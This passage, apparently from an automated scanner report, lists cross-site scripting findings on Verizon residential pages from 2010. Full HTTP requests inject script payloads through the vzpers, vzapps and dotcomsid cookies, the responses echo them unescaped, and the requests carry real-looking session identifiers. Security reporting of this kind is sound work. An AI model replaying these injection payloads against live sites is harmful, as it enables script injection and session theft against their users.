User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXa9f58'><script>alert(1)</script>3592e809316; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 111207
Expires: Mon, 13 Dec 2010 00:57:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA9F58'><SCRIPT>ALERT(1)</SCRIPT>3592E809316 ' />
...[SNIP]...

1.138. http://www22.verizon.com/residential/bundles/LaConexion [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/LaConexion

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload d04be<script>alert(1)</script>d2de39e3c60 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/LaConexion HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXd04be<script>alert(1)</script>d2de39e3c60; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 111203
Expires: Mon, 13 Dec 2010 00:58:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:58:01 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:58:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:01 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXD04BE<SCRIPT>ALERT(1)</SCRIPT>D2DE39E3C60 </DIV>
...[SNIP]...

1.139. http://www22.verizon.com/residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 3f12e<script>alert(1)</script>7bc795b3508 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX3f12e<script>alert(1)</script>7bc795b3508; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 80651
Expires: Mon, 13 Dec 2010 00:40:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:12 GMT
Connection: close
Set-Cookie: ContextInfo_FIOSType=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_HSIType=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><link href="/content/commonfiles/includes/css/masterhead_new.css" rel=
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3F12E<SCRIPT>ALERT(1)</SCRIPT>7BC795B3508 </DIV>
...[SNIP]...

1.140. http://www22.verizon.com/residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f42c1'><script>alert(1)</script>1cd16e065fa was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXf42c1'><script>alert(1)</script>1cd16e065fa; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 80655
Expires: Mon, 13 Dec 2010 00:40:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:11 GMT
Connection: close
Set-Cookie: ContextInfo_FIOSType=; expires=Sun, 12-Dec-2010 00:40:11 GMT; path=/
Set-Cookie: ContextInfo_HSIType=; expires=Sun, 12-Dec-2010 00:40:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:11 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><link href="/content/commonfiles/includes/css/masterhead_new.css" rel=
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF42C1'><SCRIPT>ALERT(1)</SCRIPT>1CD16E065FA ' />
...[SNIP]...

1.141. http://www22.verizon.com/residential/bundles/Overview.aspx [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/Overview.aspx

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d14d"-alert(1)-"3bc6934934 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /residential/bundles/Overview.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; SMSESSION=LOGGEDOFF; amlbcookie=02; BTagRequired=N; showpromo=Y; vzpers=STATE=TX; refURL=https://www22.verizon.com/myverizon/?goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspx; dotcomsid=4d14d"-alert(1)-"3bc6934934; ContextInfo_LoginStatus=LoggedOut; canigetfios=Y; ASPSESSIONIDSSSCQRRB=BOCIPHNDBILEDOLNLLENIOIM; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; ContextInfo_Partner=; WT_FPC=id=2b7981012e2b18a022b1292201505722:lv=1292201657068:ss=1292201505722; BusinessUnit=business; autosuggest=on; ASPSESSIONIDCARDDBQC=PKALHINCLCFABDAMOEKKIJOM; V347=0; PDSS=PflowId=59d1fd23c98a4183a130929a9591e880; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc65d45525d5f4f58455e445a4a423660; VZGEO=west; ASP.NET_SessionId=y0dhtevok4wp3q555bgrlq45; ak-sf=false; RegistrationApp=SessionId=97f661ab-aee6-4f56-a697-5017b1150c73; CMS_TimeZoneOffset=360; vzapps=STATE=TX; ASPSESSIONIDQCRQQSAR=GJAMFOBBLDFMDHPEIONJIBNJ; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; VzApps=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; ContextInfo_State=; Source=CHSI; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6cd45525d5f4f58455e445a4a423660; ContextInfo_ZipCode=-; CP=null*; DSS=flowId=8644a0aeb63d475197c3efd56bcb6f16;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 121029
Expires: Mon, 13 Dec 2010 01:07:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:07:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:07:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:07:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:07:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:07:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "4d14d"-alert(1)-"3bc6934934"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.142. http://www22.verizon.com/residential/bundles/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ddbdf<script>alert(1)</script>a64be643975 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 121043
Expires: Mon, 13 Dec 2010 00:40:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:35 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:34 GMT; path=/
Set-Cookie: ContextInfo_State=TXddbdf<script>alert(1)</script>a64be643975; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<span runat="server" id="spnvzapp">TXDDBDF<SCRIPT>ALERT(1)</SCRIPT>A64BE643975 . </span>
...[SNIP]...

1.143. http://www22.verizon.com/residential/bundles/Overview.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/Overview.aspx

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload c4d3d<script>alert(1)</script>87b5ccc72d4 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 113500
Expires: Mon, 13 Dec 2010 00:40:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:36 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC4D3D<SCRIPT>ALERT(1)</SCRIPT>87B5CCC72D4 </DIV>
...[SNIP]...

1.144. http://www22.verizon.com/residential/bundles/Overview.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/Overview.aspx

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a6213'><script>alert(1)</script>5f9eeabfeee was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115046
Expires: Mon, 13 Dec 2010 00:40:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:35 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:35 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA6213'><SCRIPT>ALERT(1)</SCRIPT>5F9EEABFEEE ' />
...[SNIP]...

1.145. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload dc751<script>alert(1)</script>d84dcb1ffe9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TXdc751<script>alert(1)</script>d84dcb1ffe9; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TX; CP=null*; canigetfios=Y; showpromo=N; refURL=http://www22.verizon.com/; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 121176
Expires: Mon, 13 Dec 2010 00:40:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:43 GMT; path=/
Set-Cookie: ContextInfo_State=TXdc751<script>alert(1)</script>d84dcb1ffe9; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:43 GMT; path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 00:45:44 GMT; path=/residential/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<span runat="server" id="spnvzapp">TXDC751<SCRIPT>ALERT(1)</SCRIPT>D84DCB1FFE9 . </span>
...[SNIP]...

1.146. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db07c'><script>alert(1)</script>3ae92b157f was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TXdb07c'><script>alert(1)</script>3ae92b157f; CP=null*; canigetfios=Y; showpromo=N; refURL=http://www22.verizon.com/; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115032
Expires: Mon, 13 Dec 2010 00:40:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:44 GMT; path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 00:45:44 GMT; path=/residential/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXDB07C'><SCRIPT>ALERT(1)</SCRIPT>3AE92B157F ' />
...[SNIP]...

1.147. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload bc1c1<script>alert(1)</script>1aae131b655 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
